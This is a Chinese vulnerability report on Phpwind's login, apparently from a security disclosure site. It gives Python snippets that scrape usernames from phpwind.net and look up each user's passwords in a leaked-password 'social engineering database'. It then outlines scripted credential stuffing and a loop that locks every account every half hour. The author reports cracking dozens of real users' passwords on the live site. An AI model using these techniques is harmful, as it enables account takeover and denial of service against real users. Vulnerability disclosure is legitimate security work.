### 简要描述:
Phpwind在登录处可以撞库(官网演示)
以及锁定他人帐号,可持续(批量锁定是不是很爽,未测试。。。。。)
开启验证码也可绕过。
### 详细说明:
黑盒测试的直接说怎么用吧。
1.
我们先把所有帐号的用户提取出来。
代码如下
```
def get(uid):
con=urllib2.urlopen("http://www.phpwind.net/index.php?m=space&uid="+str(uid)).read()
r=re.compile('<title>(\S+)的个人空间')
return r.findall(con)
```
2.
再来做个社工库的接口,根据用户名提取密码。
```
def getpass(name):
con=urllib2.urlopen("http://192.168.1.117/xxx.php?so="+name).read()
r=re.compile('<td width="27%">(\S{1,16})</td>')
return r.findall(con)
```
3.
说完这个我们可以说如何撞库了。
在登录的页面。
http://www.phpwind.net/index.php?m=u&c=login
输入正确的验证码,然后单击登录进行抓包。
然后自己可以写一个脚本撞库就行了。
4.
再说下如何批量锁定帐号。
拿官网说明。
官网的帐号是密码六次错误就锁定30分钟。
我们可以写一个脚本。 就在那一直进行爆破错误的密码。6次锁定。
然后用户无法登录了。
半小时之后继续。。。。。。
设想下,写个脚本,半小时从id 1到最后(可以新注册帐号查看最后id)
爆破错误的密码6次,然后锁定了。
半小时循环一次。。。。。
### 漏洞证明:
测试了1000个id,撞出来了几十个密码。
未去重。
有的帐号,库中密码不止6个,所以直接锁死了,也不是很正确。
so 下面数据仅仅是展示效果。
[<img src="https://images.seebug.org/upload/201411/1022095028056f22bc0773bbd771908b22e9b831.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/1022095028056f22bc0773bbd771908b22e9b831.png)
[<img src="https://images.seebug.org/upload/201411/1022095603edc4388ba20803aae48f20eb5595ba.png" alt="图片2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/1022095603edc4388ba20803aae48f20eb5595ba.png)
[<img src="https://images.seebug.org/upload/201411/10221352ef8b09a9aff9c5e2cc813ac1d9708dcb.png" alt="图片3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/10221352ef8b09a9aff9c5e2cc813ac1d9708dcb.png)
[<img src="https://images.seebug.org/upload/201411/10221404a11c66ed5d53d0a80d6b722abbfed8b5.png" alt="图片4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/10221404a11c66ed5d53d0a80d6b722abbfed8b5.png)
[<img src="https://images.seebug.org/upload/201411/102214156cacfe3f83824596e78565f70540bf4e.png" alt="图片5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/102214156cacfe3f83824596e78565f70540bf4e.png)
暂无评论